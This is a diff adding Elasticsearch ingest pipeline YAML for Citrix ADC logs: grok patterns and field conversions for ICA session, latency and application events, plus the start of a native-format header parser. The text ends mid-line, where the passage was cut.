@@ -0,0 +1,557 @@ +--- +description: Pipeline for Citrix Native messages of ICA feature. +processors: + - grok: + description: Extract fields from message of ICA feature. + tag: grok_ica_feature + field: citrix.extended.message + patterns: + - '^session_guid %{WORD:citrix_adc.log.session_guid} - device_serial_number %{NUMBER:citrix_adc.log.device_serial_number:int} - client_cookie%{SPACE}:%{SPACE}%{WORD:citrix_adc.log.client_cookie} - flags %{NUMBER:citrix_adc.log.flags:int} - session_setup_time %{DATA:citrix_adc.log.session_setup_time} - client_ip %{IP:citrix_adc.log.client_ip} - client_type %{NUMBER:citrix_adc.log.client_type:int} - client_launcher %{NUMBER:citrix_adc.log.client_launcher:int} - client_version %{DATA:citrix_adc.log.client_version} - client_hostname %{DATA:citrix_adc.log.client_hostname} - domain_name %{DATA:citrix_adc.log.domain_name} - server_name %{DATA:citrix_adc.log.server.name} - connection_priority %{NUMBER:citrix_adc.log.connection_priority:int} - access_type %{NUMBER:citrix_adc.log.access_type:int} - status %{NUMBER:citrix_adc.log.status:int} - username %{USERNAME:citrix_adc.log.username}$' + - '^session_guid %{WORD:citrix_adc.log.session_guid} - device_serial_number %{NUMBER:citrix_adc.log.device_serial_number:int} - client_cookie %{WORD:citrix_adc.log.client_cookie} - flags %{NUMBER:citrix_adc.log.flags:int} - channel_update_begin %{DATA:citrix_adc.log.channel_update.begin} - channel_update_end %{DATA:citrix_adc.log.channel_update.end} - channel_id_1 %{NUMBER:citrix_adc.log.channel_id_1:int} - channel_id_1_val %{NUMBER:citrix_adc.log.channel_id_1_val:int} - channel_id_2 %{NUMBER:citrix_adc.log.channel_id_2:int} - channel_id_2_val %{NUMBER:citrix_adc.log.channel_id_2_val:int} - channel_id_3 %{NUMBER:citrix_adc.log.channel_id_3:int} - channel_id_3_val %{NUMBER:citrix_adc.log.channel_id_3_val:int} - channel_id_4 %{NUMBER:citrix_adc.log.channel_id_4:int} - channel_id_4_val %{NUMBER:citrix_adc.log.channel_id_4_val:int} - channel_id_5 
%{NUMBER:citrix_adc.log.channel_id_5:int} - channel_id_5_val %{NUMBER:citrix_adc.log.channel_id_5_val:int}$' + - '^session_guid %{WORD:citrix_adc.log.session_guid} - device_serial_number %{NUMBER:citrix_adc.log.device_serial_number:int} - client_cookie %{WORD:citrix_adc.log.client_cookie} - flags %{NUMBER:citrix_adc.log.flags:int} - nsica_session_status %{NUMBER:citrix_adc.log.nsica_session.status:int} - nsica_session_client_ip %{IP:citrix_adc.log.nsica_session.client.ip} - nsica_session_client_port %{NUMBER:citrix_adc.log.nsica_session.client.port:int} - nsica_session_server_ip %{IP:citrix_adc.log.nsica_session.server.ip} - nsica_session_server_port %{NUMBER:citrix_adc.log.nsica_session.server.port:int} - nsica_session_reconnect_count %{NUMBER:citrix_adc.log.nsica_session.reconnect_count:int} - nsica_session_acr_count %{NUMBER:citrix_adc.log.nsica_session.acr_count:int} - connection_priority %{NUMBER:citrix_adc.log.connection_priority:int} - timestamp %{DATA:citrix_adc.log.timestamp} -$' + - '^session_guid %{WORD:citrix_adc.log.session_guid} - device_serial_number %{NUMBER:citrix_adc.log.device_serial_number:int} - client_cookie %{WORD:citrix_adc.log.client_cookie} - flags %{NUMBER:citrix_adc.log.flags:int} - nsica_status %{NUMBER:citrix_adc.log.nsica_status:int} - L7LatencyThresholdFactor %{NUMBER:citrix_adc.log.l7_latency.threshold_factor:int} - L7LatencyWaittime %{NUMBER:citrix_adc.log.l7_latency.waittime:int} - L7LatencyNotifyInterval %{NUMBER:citrix_adc.log.l7_latency.notify_interval:int} - L7LatencyMaxNotifyCount %{NUMBER:citrix_adc.log.l7_latency.max_notify_count:int} - L7ThresholdBreachAvgClientsideLatency %{NUMBER:citrix_adc.log.l7_threshold_breach.avg_clientside_latency:int} - L7ThresholdBreachMaxClientsideLatency %{NUMBER:citrix_adc.log.l7_threshold_breach.max_clientside_latency:int} - L7ThresholdBreachAvgServersideLatency %{NUMBER:citrix_adc.log.l7_threshold_breach.avg_serverside_latency:int} - L7ThresholdBreachMaxServersideLatency 
%{NUMBER:citrix_adc.log.l7_threshold_breach.max_serverside_latency:int} - MinL7Latency %{NUMBER:citrix_adc.log.min_l7_latency:int} -$' + - '^session_guid %{WORD:citrix_adc.log.session_guid} - device_serial_number %{NUMBER:citrix_adc.log.device_serial_number:int} - client_cookie %{WORD:citrix_adc.log.client_cookie} - flags %{NUMBER:citrix_adc.log.flags:int} - session_end_time %{DATA:citrix_adc.log.session_end_time}$' + - '^session_guid %{WORD:citrix_adc.log.session_guid} - device_serial_number %{NUMBER:citrix_adc.log.device_serial_number:int} - client_cookie %{WORD:citrix_adc.log.client_cookie} - flags %{NUMBER:citrix_adc.log.flags:int} - ica_rtt %{NUMBER:citrix_adc.log.ica_rtt:int} - clientside_rxbytes %{NUMBER:citrix_adc.log.clientside.rxbytes:int} - clientside_txbytes %{NUMBER:citrix_adc.log.clientside.txbytes:int} - clientside_packet_retransmits %{NUMBER:citrix_adc.log.clientside.packet_retransmits:int} - serverside_packet_retransmits %{NUMBER:citrix_adc.log.serverside.packet_retransmits:int} - clientside_rtt %{NUMBER:citrix_adc.log.clientside.rtt:int} - serverside_rtt %{NUMBER:citrix_adc.log.serverside.rtt:int} - clientside_jitter %{NUMBER:citrix_adc.log.clientside.jitter:int} - serverside_jitter %{NUMBER:citrix_adc.log.serverside.jitter:int}$' + - '^session_guid %{WORD:citrix_adc.log.session_guid} - device_serial_number %{NUMBER:citrix_adc.log.device_serial_number:int} - client_cookie %{WORD:citrix_adc.log.client_cookie} - flags %{NUMBER:citrix_adc.log.flags:int} - startup_duration %{NUMBER:citrix_adc.log.startup_duration:int} - launch_mechanism %{NUMBER:citrix_adc.log.launch_mechanism:int} - app_launch_time %{DATA:citrix_adc.log.app.launch_time} - app_process_id %{NUMBER:citrix_adc.log.app.process_id:int} - app_name %{DATA:citrix_adc.log.app.name} - module_path %{GREEDYDATA:citrix_adc.log.module_path}$' + - '^session_guid %{WORD:citrix_adc.log.session_guid} - device_serial_number %{NUMBER:citrix_adc.log.device_serial_number:int} - client_cookie 
%{WORD:citrix_adc.log.client_cookie} - flags %{NUMBER:citrix_adc.log.flags:int} - app_termination_type %{NUMBER:citrix_adc.log.app.termination_type:int} - app_process_id %{NUMBER:citrix_adc.log.app.process_id:int} - app_termination_time %{DATA:citrix_adc.log.app.termination_time}$' + - '%{GREEDYDATA:citrix_adc.log.message}' + ignore_failure: true + - convert: + field: citrix_adc.log.client_ip + tag: convert_client_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.client_ip != null && ctx.citrix_adc?.log.client_ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: client.ip + tag: set_client_ip_from_client_ip + copy_from: citrix_adc.log.client_ip + ignore_empty_value: true + - date: + field: citrix_adc.log.timestamp + tag: date_timestamp + target_field: citrix_adc.log.timestamp + formats: + - UNIX + - ISO8601 + - MM/dd/yyyy:HH:mm:ss + - MMM d HH:mm:ss + - MMM d HH:mm:ss + - MMM dd HH:mm:ss + - MMMM d HH:mm:ss + - MMMM d HH:mm:ss + - MMMM dd HH:mm:ss + - yyyy MMM d HH:mm:ss + - yyyy MMM d HH:mm:ss + - yyyy MMM dd HH:mm:ss + - yyyy MMMM d HH:mm:ss + - yyyy MMMM d HH:mm:ss + - yyyy MMMM dd HH:mm:ss + if: ctx.citrix_adc?.log?.timestamp != null && ctx.citrix_adc.log.timestamp != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.clientside.rxbytes + tag: convert_clientside_rxbytes_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in 
pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.bytes + tag: set_destination_bytes_from_clientside_rxbytes + copy_from: citrix_adc.log.clientside.rxbytes + ignore_empty_value: true + - convert: + field: citrix_adc.log.nsica_session.server.ip + tag: convert_destination_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.nsica_session?.server?.ip != null && ctx.citrix_adc.log.nsica_session.server.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.ip + tag: set_destination_ip_from_nsica_session_server_ip + copy_from: citrix_adc.log.nsica_session.server.ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.nsica_session.server.port + tag: convert_nsica_session_server_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.port + tag: set_destination_ip_from_nsica_session_server_port + copy_from: citrix_adc.log.nsica_session.server.port + ignore_empty_value: true + - convert: + field: citrix_adc.log.clientside.txbytes + tag: convert_clientside_txbytes_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.bytes + tag: set_source_bytes_from_clientside_txbytes + copy_from: 
citrix_adc.log.clientside.txbytes + ignore_empty_value: true + - convert: + field: citrix_adc.log.nsica_session.client.ip + tag: convert_nsica_session_client_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.nsica_session?.client?.ip != null && ctx.citrix_adc?.log.nsica_session.client.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.ip + tag: set_source_ip_from_nsica_session_client_ip + copy_from: citrix_adc.log.nsica_session.client.ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.nsica_session.client.port + tag: convert_nsica_session_client_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.port + tag: set_source_port_from_nsica_session_client_port + copy_from: citrix_adc.log.nsica_session.client.port + ignore_empty_value: true + - set: + field: user.domain + tag: set_user_domain_from_domain_name + copy_from: citrix_adc.log.domain_name + ignore_empty_value: true + - set: + field: user.name + tag: set_user_name_from_username + copy_from: citrix_adc.log.username + ignore_empty_value: true + - convert: + field: citrix_adc.log.device_serial_number + tag: convert_device_serial_number_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: 
citrix_adc.log.flags + tag: convert_flags_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.nsica_session.status + tag: convert_nsica_session_status_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.access_type + tag: convert_access_type_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.app.termination_type + tag: convert_app_termination_type_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.client_launcher + tag: convert_client_launcher_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.client_type + tag: 
convert_client_type_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.client_version + tag: convert_client_version_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.connection_priority + tag: convert_connection_priority_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.launch_mechanism + tag: convert_launch_mechanism_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.status + tag: convert_status_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.channel_id_1 + tag: convert_channel_id_1_to_long + type: long + ignore_missing: true + 
on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.channel_id_1_val + tag: convert_channel_id_1_val_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.channel_id_2 + tag: convert_channel_id_2_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.channel_id_2_val + tag: convert_channel_id_2_val_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.channel_id_3 + tag: convert_channel_id_3_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.channel_id_3_val + tag: convert_channel_id_3_val_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor 
{{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.channel_id_4 + tag: convert_channel_id_4_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.channel_id_4_val + tag: convert_channel_id_4_val_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.channel_id_5 + tag: convert_channel_id_5_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.channel_id_5_val + tag: convert_channel_id_5_val_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.nsica_session.reconnect_count + tag: convert_nsica_session_reconnect_count_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag 
{{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.nsica_session.acr_count + tag: convert_nsica_session_acr_count_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.nsica_status + tag: convert_nsica_status_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.l7_latency.max_notify_count + tag: convert_l7_latency_max_notify_count_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.l7_latency.notify_interval + tag: convert_l7_latency_notify_interval_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.l7_latency.threshold_factor + tag: convert_l7_latency_threshold_factor_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor 
{{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: citrix_adc.log.l7_latency.waittime + tag: date_l7_latency_waittime + target_field: citrix_adc.log.l7_latency.waittime + formats: + - UNIX + if: ctx.citrix_adc?.log?.l7_latency?.waittime != null && ctx.citrix_adc.log.l7_latency.waittime != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.l7_threshold_breach.avg_clientside_latency + tag: convert_l7_threshold_breach_avg_clientside_latency_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.l7_threshold_breach.avg_serverside_latency + tag: convert_l7_threshold_breach_avg_serverside_latency_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.l7_threshold_breach.max_clientside_latency + tag: convert_l7_threshold_breach_max_clientside_latency_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: 
{{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.l7_threshold_breach.max_serverside_latency + tag: convert_l7_threshold_breach_max_serverside_latency_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.min_l7_latency + tag: convert_min_l7_latency_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.clientside.packet_retransmits + tag: convert_clientside_packet_retransmits_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.serverside_packet_retransmits + tag: convert_serverside_packet_retransmits_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.clientside.jitter + tag: convert_clientside_jitter_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline 
{{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.serverside_jitter + tag: convert_serverside_jitter_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.startup_duration + tag: convert_startup_duration_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.app.process_id + tag: convert_app_process_id_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.clientside.rtt + tag: convert_clientside_rtt_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.serverside.rtt + tag: convert_serverside_rtt_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: 
{{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.ica_rtt + tag: convert_ica_rtt_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.l7_latency.waittime + tag: convert_l7_latency_waittime_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - grok: + if: ctx.citrix_adc?.log?.client_version != null && ctx.citrix_adc.log.client_version != '' + tag: grok_protocol_version + field: citrix_adc.log.client_version + patterns: + - "^%{DATA:tls.version_protocol}v%{DATA:tls.version}$" + ignore_failure: true +on_failure: + - set: + field: event.kind + value: pipeline_error + - append: + field: error.message + value: '{{{ _ingest.on_failure_message }}}' diff --git a/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/native.yml b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/native.yml new file mode 100644 index 00000000000..4bbcd574c9b --- /dev/null +++ b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/native.yml 
@@ -0,0 +1,416 @@ +--- +description: Pipeline for Citrix Native messages. +processors: + - set: + field: citrix.cef_format + tag: set_cef_format + value: false + - grok: + description: Extract native header and message. + tag: grok_detail + field: citrix.detail + patterns: + - '^%{SPACE}%{HEADER} : %{DATA:_tmp.details} : +"%{GREEDYDATA:citrix.extended.message}"' + - '^%{SPACE}%{HEADER} : %{DATA:_tmp.details} : +%{GREEDYDATA:citrix.extended.message}' + pattern_definitions: + HEADER: '(?:<%{NUMBER}>%{SPACE})?%{NATIVE_TIMESTAMP:_tmp.timestamp_native} %{WORD:event.timezone} (?:%{SYSLOGHOST:citrix.host} )?%{INT}-PPE-%{INT}' + NATIVE_TIMESTAMP: '(?:%{MONTHNUM}/%{MONTHDAY}/%{YEAR}|%{YEAR}/%{MONTHNUM}/%{MONTHDAY}):%{HOUR}:%{MINUTE}:%{SECOND}' + - grok: + description: Parse out details. + tag: grok_tmp_details + field: _tmp.details + patterns: + - '^%{DEFAULT:_tmp.default}?%{WORD:citrix.device_event_class_id} %{GREEDYDATA:citrix.name} %{INT:event.id} %{INT:event.severity}$' + pattern_definitions: + DEFAULT: 'default ' + - set: + field: event.category + tag: set_event_category_network + if: ctx.citrix?.device_event_class_id != null && !['UI','CLI','GUI','API','CONSOLE','AAA','SSLVPN'].contains(ctx.citrix.device_event_class_id.toUpperCase()) + value: [network] + - set: + field: event.category + tag: set_event_category_authentication + if: ctx.citrix?.device_event_class_id != null && ['AAA','SSLVPN'].contains(ctx.citrix.device_event_class_id.toUpperCase()) + value: [authentication] + - set: + field: event.type + tag: set_event_type_info + if: ctx.citrix?.device_event_class_id != null && !['TCP','UI','CLI','GUI','API','CONSOLE'].contains(ctx.citrix.device_event_class_id.toUpperCase()) + value: [info] + - set: + field: event.type + tag: set_event_category + if: ctx.citrix?.device_event_class_id != null && ['TCP'].contains(ctx.citrix.device_event_class_id.toUpperCase()) + value: [end,connection] + - set: + field: event.category + tag: set_event_category_process + if: 
